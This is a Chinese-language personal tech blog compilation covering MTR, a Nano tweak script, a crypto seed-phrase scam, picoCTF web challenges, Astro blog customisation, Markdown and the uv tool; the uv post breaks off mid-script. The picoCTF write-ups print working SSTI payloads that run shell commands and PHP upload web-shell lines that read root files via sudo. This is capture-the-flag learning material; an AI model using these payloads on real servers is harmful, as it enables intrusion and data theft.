CHIEN 的技術筆記

MTR 網路診斷工具完整教學：Linux 網路追蹤與監控指南

CHIEN (qian) — Wed, 01 Nov 2023 00:00:00 GMT

什麼是 MTR？

MTR (My Traceroute) 是一個強大的 Linux 網路診斷工具，它巧妙地結合了 ping 和 traceroute 兩大工具的優點。與傳統的 traceroute 只執行一次路由追蹤不同，MTR 會持續監控網路中的每一個路由節點和每一跳 (hop)，提供即時的網路品質數據，幫助您快速診斷網路問題、分析封包遺失和延遲狀況。

對於網路管理員和系統工程師來說，MTR 是進行網路故障排除的必備工具，能夠清楚呈現從源頭到目標主機之間所有節點的連線狀態。

印象中好像有看過 WinMTR 之類的酷東東（Windows 版本）

~~不是NTR，我第一次聽到這工具的時候聽成ntr~~

~~我還試著apt-get install ntr -y~~

MTR 安裝教學（Ubuntu/Debian）

在 Ubuntu 或 Debian 系統上安裝 MTR 非常簡單，只需要一行指令：

apt-get install mtr -y

安裝完成後，就可以立即開始使用 MTR 進行網路診斷了。

MTR 基礎使用方法與指令範例

最簡單的用法

執行 MTR 最基本的方式就是直接指定目標 IP 或網域：

$ mtr 1.1.1.1

執行後，您會看到類似下方的輸出畫面。MTR 會即時顯示路由路徑、封包遺失率 (Loss%)、已傳送封包數 (Snt)、最後一次延遲 (Last)、平均延遲 (Avg)、最佳延遲 (Best)、最差延遲 (Wrst) 等詳細的網路診斷資訊。

指定 IPv4 或 IPv6 協定

您可以使用 -4 或 -6 參數來強制 MTR 使用特定的 IP 協定版本：

# 強制使用 IPv4
mtr 1.1.1.1 -4

# 強制使用 IPv6
mtr cloudflare.com -6

同時顯示網域名稱與 IP 位址

使用 -b 參數可以讓 MTR 同時顯示每個節點的網域名稱和 IP 位址，方便識別路由經過的網路設備：

mtr cloudflare.com -b

僅顯示 IP 位址（不解析網域名稱）

如果您想要加快 MTR 的執行速度，或是只想看 IP 位址，可以使用 -n 參數跳過 DNS 反向解析：

mtr -n cloudflare.com

設定 Ping 次數上限

使用 -c 參數可以限制 MTR 的 ping 測試次數。當 Snt 欄位達到指定數字後，MTR 會自動結束並顯示統計結果：

mtr 1.1.1.1 -c 6

這個參數在需要快速測試或自動化腳本中特別有用。

MTR 結果匯出與報告生成

將結果匯出為文字檔

有時候我們需要將 MTR 的測試結果保存下來，用於報告撰寫、與同事分享或是向老闆呈現網路狀況（或是炫耀直連 Google 的低延遲！）。

使用 -r 參數配合輸出重導向，就能將結果儲存為文字檔：

mtr 1.1.1.1 -r > owo.txt -c 6

上述指令的意思是：

追蹤到 1.1.1.1 的路由
使用報告模式 (-r)
輸出到當前目錄下的 owo.txt 檔案
限制測試 6 次後自動結束 (-c 6)

匯出後的 owo.txt 內容範例如下：

使用 TCP 或 UDP 協定進行測試

預設情況下，MTR 使用 ICMP 封包進行測試。但某些網路環境可能會封鎖 ICMP，此時您可以改用 TCP 或 UDP 協定：

# 使用 TCP 協定
mtr 1.1.1.1 --tcp

# 使用 UDP 協定
mtr 1.1.1.1 --udp

這在診斷防火牆問題或特定協定的網路路徑時非常有用。

指定來源 IP 位址

如果您的系統有多個網路介面或 IP 位址，可以使用 -a 參數指定從哪個 IP 發送測試封包：

mtr -a <來源IP> 目標主機

MTR 使用技巧總結

MTR 是網路診斷的瑞士刀，結合了 ping 的持續監控和 traceroute 的路由追蹤功能。掌握 MTR 能讓您：

快速定位網路問題：清楚看到哪個節點出現封包遺失或高延遲
持續監控網路品質：即時觀察網路狀態變化
生成專業報告：匯出詳細數據供分析或呈報

何時使用 MTR？

網站或服務出現間歇性連線問題
需要追蹤網路封包的完整路徑
診斷特定節點的網路品質
比較不同時段的網路狀況

MTR vs 其他工具

vs Ping：MTR 提供完整路由路徑資訊，而不只是終點主機的延遲
vs Traceroute：MTR 持續監控並提供統計數據，traceroute 只執行一次
vs Pathping (Windows)：MTR 在 Linux 環境下更輕量且即時性更好

延伸閱讀

想了解更多關於 MTR 和網路診斷的知識嗎？推薦以下資源：

Better Nano: 讓你的 Nano 編輯器更好用 (優化腳本推薦)

CHIEN (qian) — Mon, 06 May 2024 00:00:00 GMT

前言：為什麼需要優化 Nano？

對於許多 Linux 使用者和系統管理員來說，Nano 是最常接觸的文字編輯器之一。它輕量、簡單，且幾乎預裝在所有的 Linux 發行版中。然而，預設的 Nano 功能較為陽春，缺乏語法高亮、行號顯示等現代編輯器常見的功能，這在編輯程式碼或設定檔時可能會降低效率。

這篇文章要介紹一個由 OsGa 開發的 better-nano 優化腳本，它能一鍵升級你的 Nano 使用體驗。

Better Nano 的主要功能

這個腳本主要針對以下幾個方面進行優化：

外觀優化 (Interface)：
- 開啟 語法高亮 (Syntax Highlighting)：讓程式碼和設定檔更易於閱讀。
- 顯示 行號 (Line Numbers)：方便除錯和定位特定行數。
- 改善狀態列資訊。
效能與操作 (Performance & Usability)：
- 啟用 滑鼠支援：允許使用滑鼠游標移動插入點（視終端機支援而定）。
- 優化縮排設定 (Tab/Space)。
快捷鍵優化 (Keybindings)：
- 調整部分快捷鍵以符合現代操作習慣（具體細節視腳本版本而定）。

如何安裝

安裝過程非常簡單，只需要一行指令即可完成。

步驟 1：取得腳本

你可以前往 GitHub 專案頁面查看詳細資訊： 👉 前往 GitHub: osga24/better_nano

步驟 2：執行安裝

通常這類腳本會需要 git clone 下來後執行安裝檔。

git clone https://github.com/osga24/better_nano.git
cd better_nano
chmod +x install.sh
./install.sh

[!WARNING] 注意事項：執行此腳本可能會要求輸入 sudo 密碼，因為它需要修改系統層級或使用者層級的 Nano 設定檔（如 /etc/nanorc 或 ~/.nanorc）。請確保你信任來源程式碼再執行。

結語

透過 better-nano，你可以保留 Nano 的輕量優勢，同時獲得接近 IDE 的視覺體驗。如果你是 Vim 或 Emacs 的苦手，但又需要比預設 Nano 更強大的功能，這個腳本絕對值得一試。

感謝 OsGa 開發此工具。 ||請不要扁我||

有人自己洩漏註記詞?

CHIEN (qian) — Sat, 19 Oct 2024 00:00:00 GMT

自己洩漏註記詞?

有時候會在一些社交平台看到，有人發文說不完合約或是crypto了，剩下1000U或是幾百說要送人，又或者是說不知道怎麼轉移USDT到幣安、OKX等交易所，想請你幫忙這時候你可能會想說，這白癡是不是自己洩漏了註記詞，或是私鑰，然後想要把錢轉移出去，但是不知道怎麼操作，所以才會發文求助，但是

:::rabbit 當你想把錢轉出去時，你才是真正的白癡 :::

但是但是當你要轉USDT出去時你會發現他說Gas Fee不夠需要先支付一點trx進錢包，當你把錢轉入之後他會馬上轉走就算你動作再快也沒有用，因為通常會有多簽或是智能合約。

原理

他可能使用了多簽功能，多簽功能是指一個錢包需要進行交易或是任何動作時需要多個人或是錢包同意，才可以轉錢或是進行任何動作，這樣可以增加安全性，有許多使用到加密貨幣的大企業或是多個持有者的錢包會使用到
當你要把錢轉出時會需要一個簽名的動作，這個動作需要支付Gas Fee，但是就算你轉了一點trx進去，你也沒有辦法進行簽名，因為你不是多簽的其中一個持有者，所以你的錢就會被騙走有時候不一定是多簽，也可能是智能合約。

解決方法

哭一下被騙了，下次不要再一次

結論

這是一個弱智小騙局，但是老實說殺傷力也不大，最多就是騙一點Gas Fee，但是如果你真的被騙了，也只能說你自己太貪心了，不過這也是一個提醒，不要隨便洩漏自己的註記詞或是私鑰，不然你的錢真的就會被轉走
在web3錢包中，記住詞跟私鑰就是你的一切，請不要給任何人不管是你的好友或是你的家人，除非你真的信任他們。

PicoCTF Web Exploitation Easy分級解題紀錄

CHIEN (qian) — Sat, 19 Apr 2025 00:00:00 GMT

Introduction

這是拿來放一些解題ㄉ紀錄，慢慢邊做邊寫，因為我好久沒碰了有些有有些沒有是因為有些我已經解過ㄌ，我也懶得再解一次

SSTI1

Description

SSTI (Server-Side Template Injection) 是一種網頁應用程式漏洞，當使用者輸入的資料被直接嵌入到伺服器端模板中時，就會發生這種漏洞。這可能導致攻擊者能夠執行任意的程式碼或命令，從而獲取敏感資訊或控制伺服器。

解法

首先你會看到一個酷酷的網站，有一個輸入框，你會發現不論輸入啥他都會顯示在頁面上，我們可以試試看輸入{{7*7}} 會得到什麼 <img src="https://i.imgur.com/mbFg62p.png" width="300" height="200" /> 沒錯!一個大大的49，這就是一個SSTI的漏洞，這個漏洞可以讓我們執行python的程式碼，接下來我們可以試試看{{7*7*7*7}} 會得到什麼這時我們已經確定這是一個SSTI的漏洞了，接下來我們可以來點更有趣的東西，他可以執行python的程式碼，因此應該可以執行一些系統命令

{{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}

這段程式碼大概的意思是

request.application: 訪問當前Web請求的應用
__globals__: 訪問全局命名空間，允許獲取內建函式
__import__('os'): 動態導入 os 模塊，這樣就可以使用操作系統相關功能
popen('id'): 執行系統命令 id，該命令顯示當前用戶的身份
read(): 讀取命令的輸出結果
那我們可以把命令改成，ls來看看有沒有什麼驚喜，聽話讓我看看!

{{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}}

最後只要試試看

python
{{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}}

我們就會得到flag了!
picoCTF{||幹嘛，你要自己去試試看阿!還想偷看阿hhhhhhhhhhhhhhh||}

Cookie Monster Secret Recipe

Description

Cookie ~~小餅乾~~ 是網站儲存在你瀏覽器中的小型資料，用來記住你的登入狀態、偏好設定或追蹤行為。下次你再訪問網站時，瀏覽器會自動帶上這些資訊，讓網站知道你是誰。如果 Cookie 使用不當的話，可能會出現資安漏洞或使用者隱私外洩的風險。舉例來說：

登入資訊可能被竊取：如果沒有設定 HttpOnly，攻擊者就有機會透過跨站腳本攻擊（XSS）偷走使用者的登入 Cookie，冒用身分。
使用者操作被偽造：若網站沒有防範 CSRF 攻擊，攻擊者可以利用使用者的 Cookie 發出未經授權的操作，例如轉帳或修改帳號資料。
敏感資料曝光：若在 Cookie 中儲存像是帳號、密碼、信用卡號等敏感資料，可能會被竊取或洩漏，造成重大安全問題。
跨站追蹤問題：若使用第三方 Cookie，可能被廣告商用來追蹤使用者在不同網站的行為，侵犯個人隱私。
資料被中途攔截：如果 Cookie 沒有設定 Secure，在未加密的 HTTP 傳輸過程中就可能被攔截。因此，開發者在設計網站時必須謹慎使用 Cookie，避免成為資安漏洞的來源。

解法

首先我們看到網站，並且檢查F12->儲存空間->Cookies看看裡面有沒有東西，啥都沒有
我們可以嘗試登入一下，帳號密碼隨意，哎呀看起來有問題我們可以再看一次Cookies，看看有沒有東西看起來有東西出現! 看起來長得有點像是base64編碼的東西，我們可以試試看丟到解碼的網站看看得到答案啦!

FLAG
- ||picoCTF{自己去試試看啦hahahahahahahahha}||

n0s4n1ty 1

Description

這個網站有一個上傳檔案的功能，並且會顯示上傳的檔案名稱和路徑。
有兩個需要注意的地方是未檢查的檔案上傳以及權限設定不當的問題。
這可能會導致攻擊者能夠上傳惡意檔案，並且執行任意的程式碼或命令，從而獲取敏感資訊或控制伺服器。

解法

首先我們看到網站可以上傳檔案，先上傳看看一個php檔案看看譨不能傳PNG以外的東西提示中說要重點針對sudo -l，那我們就嘗試在php中執行看看

<?php echo exec('sudo -l');?>

上傳之後顯示，讓我們去看看uploads/owo.php有甚麼東西

The file owo.php has been uploaded Path: uploads/owo.php

既然可以執行指令那我們就可以嘗試看看root資料夾下面有沒有什麼驚喜

<?php echo exec('sudo ls -al /root ');?>

再次訪問網站並且去到uploads/owo.php會顯示

-rw-r--r-- 1 root root 36 Mar 6 03:56 flag.txt

那我們可以喵喵一下把檔案內容顯示出來!

<?php echo exec('sudo cat /root/flag.txt');?>

哎呀又找到ㄌ

FLAG
- picoCTF{||aaaaaaaaaaa自己去試試看啦||}

head-dump

Description

Heap dump（堆轉儲）是 Java 虛擬機（JVM）在特定時間點的內存快照，常用於診斷內存泄漏和性能問題。然而，若使用不當，可能帶來安全風險
這個題目的面相會是需要注意獲得授權的人員才可以訪問head dump文件，這個文件包含了系統的內存轉儲，可能會洩漏敏感資訊或機密資料。這可能會導致攻擊者能夠獲取敏感資訊或控制伺服器。

解法

首先我們進到網站會先看到這個頁面，題目描述中特別提到API Documentation的文章我們會發現 #API Documentation 可以按下去，並且案下去會進入API的頁面最下方有一個/headdump點開來看看，並且我們可以嘗試戳戳看API嘗試之後會發現他吐了一個200回應給我們並且可以下載dump出來的檔案接下來只要下載下來用記事本打開，但是有好多看不懂的東西怎辦，沒關係這時候只要使用尋找搜尋picoCTF就可以找到flag了!

FLAG
- picoCTF{||自己去試試看啦haskdlfjdisgsdmgzld||}

Astro 部落格客製化教學：留言、Spoiler 與功能擴充實作

CHIEN (qian) — Sat, 19 Apr 2025 00:00:00 GMT

客製化你的 Astro Blog

在用了一陣子的 Astro 之後發現我的模板其實有些功能是我想要但是原本沒有的，因此我就嘗試自己動手修改一些功能，這篇文章就是紀錄以及教學如何客製化你的 Blog。

在文章中加入防雷海苔功能

🔧 步驟 1：建立自訂 remark 插件

首先，我們需要讓 Markdown 能夠識別 ||防雷內容|| 的語法。我們會寫一個簡單的 remark 插件，將它轉換為 HTML 的 <span class="spoiler">防雷內容</span>。

在你的專案中建立一個檔案，例如：remarkSpoiler.js（建議放在專案根目錄或 src/plugins/ 目錄中），內容如下：

import { visit } from 'unist-util-visit'

export default function remarkSpoiler() {
  return (tree) => {
    visit(tree, 'text', (node, index, parent) => {
      const regex = /\|\|(.+?)\|\|/g
      const matches = [...node.value.matchAll(regex)]

      if (matches.length > 0) {
        const newNodes = []
        let lastIndex = 0

        for (const match of matches) {
          const [fullMatch, spoilerText] = match
          const matchStart = match.index
          const matchEnd = matchStart + fullMatch.length

          if (matchStart > lastIndex) {
            newNodes.push({
              type: 'text',
              value: node.value.slice(lastIndex, matchStart),
            })
          }

          newNodes.push({
            type: 'html',
            value: `<span class="spoiler">${spoilerText}</span>`,
          })

          lastIndex = matchEnd
        }

        if (lastIndex < node.value.length) {
          newNodes.push({
            type: 'text',
            value: node.value.slice(lastIndex),
          })
        }

        parent.children.splice(index, 1, ...newNodes)
      }
    })
  }
}

⚙️ 步驟 2：在 Astro 中註冊插件

打開你的 astro.config.mjs，並加上這段：

import { defineConfig } from 'astro/config'
import remarkSpoiler from './src/plugins/remarkSpoiler.js' // 路徑根據你的檔案位置調整

export default defineConfig({
  markdown: {
    remarkPlugins: [remarkSpoiler],
  },
})

那邊應該會長這樣，直接在最後加上就好：

remarkPlugins: [remarkMath, remarkReadingTime, remarkExcerpt, remarkGithubAdmonitionsToDirectives, remarkDirective, parseDirectiveNode,remarkSpoiler ],

✅ 記得重新啟動 Astro 開發伺服器：pnpm dev

🎨 步驟 3：加入防雷效果的 CSS

在 src/styles/global.css 中加入以下樣式（如果沒有這個檔案，可以自己創一個）：

.spoiler {
  background-color: #000;
  color: transparent;
  border-radius: 4px;
  padding: 0 4px;
  cursor: pointer;
  transition: color 0.3s ease;
}

.spoiler:hover {
  color: #fff;
}

✅ 使用範例

現在，你就可以在 Markdown 檔案中直接使用這樣的語法了：

這是一段正常文字，其中包含 ||這是防雷內容||，滑過才能看到。

渲染後的效果會變成：

這是一段正常文字，其中包含 <span class="spoiler">這是防雷內容</span>，滑過才能看到。

||這是效果||

在頁腳處新增網站存在時間

先看效果

🔧1.先創建時間的組件

新增一個檔案src/components/SiteRuntime.astro

---
const startDate = new Date('2023-01-01') // 替換為您的網站實際上線日期
---

<div id="site-runtime" class="text-sm opacity-75 dark:text-white text-black">
  網站已運行：<span id="runtime-counter">計算中...</span>
</div>

<script>
  function updateRuntime() {
    const startDate = new Date('2023-01-01') // 替換為您的網站實際上線日期
    const currentDate = new Date()

    const timeDiff = currentDate.getTime() - startDate.getTime()

    let seconds = Math.floor(timeDiff / 1000)
    let minutes = Math.floor(seconds / 60)
    let hours = Math.floor(minutes / 60)
    let days = Math.floor(hours / 24)

    const years = Math.floor(days / 365)
    const months = Math.floor((days % 365) / 30)
    days = days % 30
    hours = hours % 24
    minutes = minutes % 60
    seconds = seconds % 60

    let runtimeText = ''

    if (years > 0) {
      runtimeText += `${years} 年 `
    }

    if (months > 0 || years > 0) {
      runtimeText += `${months} 個月 `
    }

    runtimeText += `${days} 天 ${hours} 時 ${minutes} 分 ${seconds} 秒`

    document.getElementById('runtime-counter').textContent = runtimeText
  }

  updateRuntime()
  setInterval(updateRuntime, 1000)
</script>

⚙️2. 在頁腳引入這個組件

可能是在 src\layouts\MainGridLayout.astro中

---
import SiteRuntime from '../components/SiteRuntime.astro'
// 其他導入...
---

<!-- 您的頁腳部分 -->
<footer class="mt-8 py-6 border-t border-gray-200 dark:border-gray-700">
  <div class="container mx-auto px-4">
    <div class="flex flex-col items-center justify-center text-center">
      <div class="mb-2">
        <SiteRuntime />
      </div>
      <div class="text-sm opacity-75 dark:text-white text-black"></div>
    </div>
  </div>
</footer>

Markdown 完整教學指南:語法、範例與實用技巧一次掌握

CHIEN (qian) — Wed, 23 Jul 2025 00:00:00 GMT

::::note 如果這篇文章有任何缺漏，歡迎指正！ ::::

Markdown 是什麼!

Markdown 是一種輕量級標記語言，它以易讀易寫的純文字格式撰寫文件，並轉換為其他格式！Markdown 的設計理念是：

易讀易寫，讓人可以輕易閱讀並且專注於內容本身。
格式轉換簡單，易於在不同平台之間轉換。
可讀性高，易於閱讀和維護。

Markdown 的使用場景

某些Blog生成器會使用Markdown來撰寫文章
專案的README文件
某些筆記軟體
社交軟體或是一些論壇發文時會用到

Markdown 跟 HTML 的差別

Markdown 比 HTML 更易讀易寫。
Markdown 比 HTML 更易於在不同平台之間轉換。
Markdown 比 HTML 更易於閱讀和維護。

語法比較

兩個大標題分別的語法會是

<h1>Hello World</h1>

# Hello World

所以可以很輕易的看出來！ Markdown 對人類來說比 HTML 更易讀易寫!

語法範例！

標題

# 標題1
## 標題2
### 標題3

列表

列表分為無序列表還有有序列表，區別就是有沒有數字順序

無序列表

- 列表1
- 列表2
- 列表3

列表1

有序列表

1. 列表1
2. 列表2
3. 列表3

列表1
列表2

引用

> 引用

引用

連結

[連結](https://www.google.com)

連結

圖片

引用圖片的方式跟連結的方式幾乎一樣，只是前面多了一個驚嘆號

![圖片](https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png)

粗體

**粗體**

粗體

斜體

_斜體_

斜體

刪除線

刪除線在內容的開頭以及結尾各加上兩個波浪符號，請注意不要用到全型

~~刪除線~~

~~刪除線~~

防雷海苔

防雷海苔的語法是在內容的開頭以及結尾各加上兩個 | 符號，請注意不要用到全型

||防雷海苔||

||防雷海苔||

程式碼

程式碼區塊有分兩種，一種是行內程式碼，一種是程式碼區塊

程式碼區塊

```程式語言名稱
程式碼內容
```

print("Hello, World!")

行內程式碼

行內程式碼適合在文字中插入簡短的程式碼片段，使用單個反引號包圍：

`行內程式碼`

行內程式碼

表格

表格稍微複雜一點，但是只要記住格式就很簡單了

基本表格

| 標題1 | 標題2 | 標題3 |
| ----- | ----- | ----- |
| 內容1 | 內容2 | 內容3 |

標題1	標題2	標題3
內容1	內容2	內容3

表格對齊

| 左對齊 | 置中對齊 | 右對齊 |
| :----- | :------: | -----: |
| 內容   |   內容   |   內容 |

左對齊	置中對齊	右對齊
內容	內容	內容

分隔線

---

任務列表

- [ ] TODO1
- [x] TODO2

[ ] TODO1
[x] TODO2

嵌套列表

列表可以有多層嵌套，使用縮排來表示層級：

1. 第一層項目
   - 第二層項目
   - 第二層項目
     - 第三層項目
2. 第一層項目
   1. 第二層數字項目
   2. 第二層數字項目

效果：

第一層項目
- 第二層項目
- 第二層項目
  - 第三層項目
第一層項目
1. 第二層數字項目
2. 第二層數字項目

數學公式

本網站支援 LaTeX 數學公式，使用 KaTeX 渲染：

行內公式

$E = mc^2$

效果： $E = mc^2$

區塊公式

$$
\sum_{i=1}^{n} x_i = x_1 + x_2 + \cdots + x_n
$$

效果： $$ \sum_{i=1}^{n} x_i = x_1 + x_2 + \cdots + x_n $$

換行

Markdown 中有幾種換行方式：

段落換行

第一段

第二段（中間空一行）

強制換行

第一行（行末加兩個空格）  
第二行

或使用 HTML 標籤：
第一行<br>第二行

效果： 第一行（行末加兩個空格）
第二行

或使用 HTML 標籤：第一行<br>第二行

轉義字符

想要顯示 Markdown 特殊字符本身時，使用反斜線轉義：

\* 這不會變成列表
\# 這不會變成標題
\` 這不會變成程式碼
\[不會變成連結\]
\**不會變成粗體\**

效果：
* 這不會變成列表
# 這不會變成標題
` 這不會變成程式碼
[不會變成連結]
*不會變成粗體*

uv 完全指南：極速 Python 套件與專案管理工具。

CHIEN (qian) — Mon, 24 Nov 2025 00:00:00 GMT

uv：極速 Python 套件與專案管理工具

:::tip 已經在使用 uv 了嗎？
如果你只是忘記在某些場景下該怎麼下命令，可以直接跳到常見場景章節快速查找！如果是忘記指令怎麼下，請直接跳到常用命令速查章節快速查找！ :::

什麼是 uv？

uv 是一個用 Rust 編寫的極速 Python 包和專案管理器，由 Astral 開發（也就是創造了超快 Python Linter Ruff 的那個團隊！）。

簡單來說，uv 就是一個超級快速的 Python 工具，並且下載套件時支援多線程下載，可以幫你管理：

📦 Python 套件（取代 pip）
🗂️ 專案依賴（取代 poetry）
🔧 開發工具（取代 pipx）
🐍 Python 版本（取代 pyenv）
🌐 虛擬環境（取代 virtualenv）

號稱比傳統的 pip 快 10-100 倍！

安裝 uv

macOS / Linux

使用官方獨立安裝程式：

$ curl -LsSf https://astral.sh/uv/install.sh | sh

Windows

使用 PowerShell：

PS> powershell -ExecutionPolicy ByPass -c "irm https://astral.sh/uv/install.ps1 | iex"

其他安裝方式

uv 也可以通過以下方式安裝：

# 使用 pip
pip install uv

# 使用 Homebrew (macOS)
brew install uv

# 使用 pipx
pipx install uv

安裝完成後，可以執行以下命令確認安裝成功：

$ uv --version

專案管理

uv 可以管理專案依賴項和環境，支援鎖文件、工作區等，類似於 poetry 或 rye。

創建新專案

$ uv init example
Initialized project `example` at `/home/user/example`

$ cd example

添加依賴

$ uv add ruff
Creating virtual environment at: .venv
Resolved 2 packages in 170ms
Built example @ file:///home/user/example
Prepared 2 packages in 627ms
Installed 2 packages in 1ms
  + example==0.1.0 (from file:///home/user/example)
  + ruff==0.5.4

運行程式

$ uv run ruff check
All checks passed!

鎖定依賴

$ uv lock
Resolved 2 packages in 0.33ms

同步環境

$ uv sync
Resolved 2 packages in 0.70ms
Audited 1 package in 0.02ms

腳本管理

uv 可以管理單文件腳本的依賴項和環境，這對於快速編寫小工具非常有用！

創建腳本並添加依賴

$ echo 'import requests; print(requests.get("https://astral.sh"))' > example.py

$ uv add --script example.py requests
Updated `example.py`

這會在 example.py 頂部添加內聯元數據來聲明依賴。

運行腳本

$ uv run example.py
Reading inline script metadata from: example.py
Installed 5 packages in 12ms
<Response [200]>

uv 會自動創建隔離的虛擬環境來運行腳本，不會污染全局環境！

工具管理

uv 可以執行和安裝由 Python 包提供的命令行工具，類似於 pipx。

臨時運行工具

使用 uvx（uv tool run 的別名）在臨時環境中運行工具：

💡 什麼是臨時環境？
臨時環境是指 uv 會為這個工具創建一個獨立的虛擬環境，運行完畢後就會自動清理，不會在你的系統中留下任何痕跡。這樣你就可以快速試用工具，而不用擔心污染系統環境或與其他套件版本衝突！

$ uvx pycowsay 'hello world!'
Resolved 1 package in 167ms
Installed 1 package in 9ms
  + pycowsay==0.0.0.2
  ------------
< hello world! >
  ------------
   \   ^__^
    \  (oo)\_______
       (__)\       )\/\
           ||----w |
           ||     ||

安裝工具

$ uv tool install ruff
Resolved 1 package in 6ms
Installed 1 package in 2ms
  + ruff==0.5.4
Installed 1 executable: ruff

$ ruff --version
ruff 0.5.4

Python 版本管理

uv 可以安裝 Python 並允許在版本之間快速切換，取代 pyenv 的功能。

安裝多個 Python 版本

$ uv python install 3.10 3.11 3.12
Searching for Python versions matching: Python 3.10
Searching for Python versions matching: Python 3.11
Searching for Python versions matching: Python 3.12
Installed 3 versions in 3.42s
  + cpython-3.10.14-macos-aarch64-none
  + cpython-3.11.9-macos-aarch64-none
  + cpython-3.12.4-macos-aarch64-none

創建指定版本的虛擬環境

$ uv venv --python 3.12.0
Using CPython 3.12.0
Creating virtual environment at: .venv
Activate with: source .venv/bin/activate

運行特定 Python 版本

$ uv run --python pypy@3.8 -- python
Python 3.8.16 (a9dbdca6fc3286b0addd2240f11d97d8e8de187a, Dec 29 2022, 11:45:30)
[PyPy 7.3.11 with GCC Apple LLVM 13.1.6 (clang-1316.0.21.2.5)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>>>

固定專案 Python 版本

在當前目錄中使用特定的 Python 版本：

$ uv python pin 3.11
Pinned `.python-version` to `3.11`

這會創建一個 .python-version 文件，uv 會自動使用這個版本。

pip 兼容接口

如果你已經習慣使用 pip，uv 提供了兼容的命令，讓你無縫遷移！

創建虛擬環境

$ uv venv
Using CPython 3.12.3
Creating virtual environment at: .venv
Activate with: source .venv/bin/activate

關閉虛擬環境

$ uv venv deactivate

編譯需求文件

將需求編譯為平台無關的需求文件：

$ uv pip compile requirements.in \
    --universal \
    --output-file requirements.txt
Resolved 43 packages in 12ms

安裝套件

$ uv pip install requests
Resolved 5 packages in 12ms
Installed 5 packages in 23ms
  + certifi==2024.7.4
  + charset-normalizer==3.3.2
  + idna==3.7
  + requests==2.32.3
  + urllib3==2.2.2

同步需求

$ uv pip sync requirements.txt
Resolved 43 packages in 11ms
Installed 43 packages in 208ms
  + babel==2.15.0
  + black==24.4.2
  + certifi==2024.7.4
  ...

常用命令速查

功能	uv 命令	傳統工具
創建專案	`uv init <name>`	-
添加依賴	`uv add <package>`	`poetry add`
移除依賴	`uv remove <package>`	`poetry remove`
安裝套件	`uv pip install <package>`	`pip install`
創建虛擬環境	`uv venv`	`python -m venv`
運行程式	`uv run <command>`	`poetry run`
運行工具	`uvx <tool>`	`pipx run`
安裝工具	`uv tool install <tool>`	`pipx install`
安裝 Python	`uv python install <version>`	`pyenv install`
鎖定依賴	`uv lock`	`poetry lock`
同步環境	`uv sync`	`poetry install`

常見場景

場景 1：分享專案環境給同事

當你開發完一個專案，想要讓同事能夠快速建立相同的環境時：

步驟 1：鎖定依賴

在你的專案目錄中，執行鎖定命令：

$ uv lock
Resolved 25 packages in 0.5ms

這會生成一個 uv.lock 文件，記錄了所有依賴的精確版本。

步驟 2：提交到版本控制

將以下文件提交到 Git：

$ git add pyproject.toml uv.lock
$ git commit -m "Add project dependencies"
$ git push

步驟 3：同事取得專案後

同事只需要執行：

$ git clone <repository-url>
$ cd <project-name>
$ uv sync

這樣就能建立完全相同的開發環境了！✨

場景 2：接手別人的專案

當你拿到一個使用 uv 管理的專案源碼時：

方法 1：使用 uv（推薦）

# 1. 進入專案目錄
$ cd project-name

# 2. 同步環境（會自動創建 .venv 並安裝依賴）
$ uv sync
Resolved 25 packages in 0.70ms
Installed 25 packages in 150ms

# 3. 運行專案
$ uv run python main.py

方法 2：如果專案還有 requirements.txt

# 創建虛擬環境
$ uv venv

# 啟動虛擬環境
$ source .venv/bin/activate  # macOS/Linux
# 或
$ .venv\Scripts\activate     # Windows

# 安裝依賴
$ uv pip install -r requirements.txt

場景 3：確保團隊使用相同的 Python 版本

步驟 1：專案負責人固定 Python 版本

$ uv python pin 3.11
Pinned `.python-version` to `3.11`

這會創建一個 .python-version 文件。

步驟 2：提交 .python-version 到 Git

$ git add .python-version
$ git commit -m "Pin Python version to 3.11"

步驟 3：團隊成員拉取後

$ git pull
$ uv sync

uv 會自動檢查並使用正確的 Python 版本！如果本地沒有，會提示安裝：

$ uv python install

場景 4：更新專案依賴

當你需要更新某個套件版本時：

# 更新單一套件
$ uv add requests@latest

# 或指定版本
$ uv add "requests>=2.31.0"

# 重新鎖定
$ uv lock

# 提交更新
$ git add pyproject.toml uv.lock
$ git commit -m "Update requests to latest version"

團隊成員拉取後執行 uv sync 即可同步更新。

場景 5：CI/CD 環境設定

在 GitHub Actions 或其他 CI/CD 環境中使用 uv：

# .github/workflows/test.yml
name: Test

on: [push, pull_request]

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      
      - name: Install uv
        run: curl -LsSf https://astral.sh/uv/install.sh | sh
      
      - name: Set up Python
        run: uv python install
      
      - name: Install dependencies
        run: uv sync
      
      - name: Run tests
        run: uv run pytest

這樣就能確保 CI 環境和本地開發環境完全一致！

場景 6：團隊中混用 pip 和 uv

當團隊中有人使用 pip，也有人使用 uv 時，可以透過以下策略協作：

策略 1：同時維護兩種依賴文件

專案同時維護 pyproject.toml 和 requirements.txt，讓兩種工具的使用者都能順利工作：

# 專案結構
project/
├── pyproject.toml      # uv 使用者使用
├── uv.lock            # uv 鎖定文件
└── requirements.txt   # pip 使用者使用

uv 使用者的工作流程：

# 添加新依賴
$ uv add requests

# 生成 requirements.txt 給 pip 使用者
$ uv pip compile pyproject.toml -o requirements.txt

# 提交兩個文件
$ git add pyproject.toml uv.lock requirements.txt
$ git commit -m "Add requests dependency"

pip 使用者的工作流程：

# 拉取更新
$ git pull

# 使用 pip 安裝
$ pip install -r requirements.txt

策略 2：使用 uv 的 pip 兼容模式

pip 使用者也可以使用 uv 的 pip 命令，維持原有的工作流程：

# 使用 uv 的 pip 命令，速度更快：
$ uv pip install -r requirements.txt    # 取代 pip install
$ uv pip freeze > requirements.txt      # 取代 pip freeze
$ uv venv                               # 取代 python -m venv

這樣可以享受 uv 的速度優勢，但維持原有的工作流程！

協作注意事項：

在 README 中說明：清楚記錄團隊使用哪種工具，以及如何安裝依賴。

:::important 文檔很重要，文檔很重要，文檔很重要，因為很重要所以要說三次，如果同事不愛寫文檔，那祝你好運 :::

## 安裝依賴

### 使用 uv
\`\`\`bash
uv sync
\`\`\`

### 使用 pip
\`\`\`bash
pip install -r requirements.txt
\`\`\`

定期同步：如果維護兩種文件，記得在添加依賴後更新 requirements.txt

使用 pre-commit hook：自動同步依賴文件

# .git/hooks/pre-commit
#!/bin/bash
if [ -f pyproject.toml ]; then
